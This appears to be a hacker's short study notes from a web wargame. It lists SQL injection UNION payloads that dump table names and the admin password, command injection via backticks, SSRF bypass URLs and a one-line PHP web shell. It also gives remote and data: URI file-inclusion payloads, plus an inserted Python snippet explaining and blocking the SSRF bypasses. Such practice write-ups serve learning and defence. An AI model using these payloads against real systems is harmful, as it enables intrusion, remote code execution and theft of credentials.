8/1

by sonysame 2019. 8. 1.


https://bob.rubiya.kr/chall.php

order by 3


There are 3 columns


0 union select 1,2,3


0 union select 1,2,version()



information schema


0 union select 1,2, info from information_schema.processlist


table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()


0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'


0 union select id, pw, 1 from user where id='admin'





system("host {input}")

`head -2 index.php`

`grep FLAG index.php`


gitdumper

git log -p 



ssrf=>pastebin


?http://a@pastebin.com:80@rubiya.kr/raw/~~~

http://asdf.kr#@rubiya.kr


ssrf bible

A new era of SSRF
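The two SSRF bypass URLs noted above work because the filter and the fetcher disagree about which host the URL names. Added example (not from the post): a sloppy regex host check beside a strict urlsplit-based allowlist; the allowlisted hosts and the /raw/x, /raw/abc123 paths are constructed assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Constructed sample URLs: the two bypass shapes from the notes plus a benign one.
BYPASS_USERINFO = "http://a@pastebin.com:80@rubiya.kr/raw/x"  # path is a placeholder
BYPASS_FRAGMENT = "http://asdf.kr#@rubiya.kr"
BENIGN = "https://pastebin.com/raw/abc123"                     # constructed path

def naive_host(url: str) -> str | None:
    """Sloppy filter: treats everything up to the FIRST '@' as credentials
    and reads the host from whatever follows. Both bypasses fool it."""
    m = re.match(r"^https?://(?:[^/@]*@)?([^/:?#]+)", url)
    return m.group(1).lower() if m else None

def real_host(url: str) -> str | None:
    """Host an RFC 3986 parser (and therefore the fetcher) connects to:
    the text after the LAST '@' of the authority, fragment discarded."""
    return urlsplit(url).hostname

def strict_allows(url: str, allowed: set[str]) -> bool:
    """Defensive allowlist: parse once, refuse the constructs that let two
    parsers disagree, then compare the parsed host exactly."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False  # credentials in the authority: the 'a@host:80@other' shape
    if parts.fragment:
        return False  # '#@host' shape: the fragment is never sent to the server
    host = parts.hostname
    # In production also resolve `host` and reject private or link-local addresses.
    return host is not None and host in allowed

if __name__ == "__main__":
    for url in (BYPASS_USERINFO, BYPASS_FRAGMENT, BENIGN):
        print(url)
        print("  naive filter sees:", naive_host(url))
        print("  fetcher connects to:", real_host(url))
        print("  strict allowlist {pastebin.com}:", strict_allows(url, {"pastebin.com"}))
```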


Put XXE into data



exif tampering tool???


file inclusion #3

Files can be included from an external source


<?php
system($_GET['c']);
?>

http://a.rubiya.kr


/payload


?page=data:text/plain,<?php%20system(id)?>;



smarty

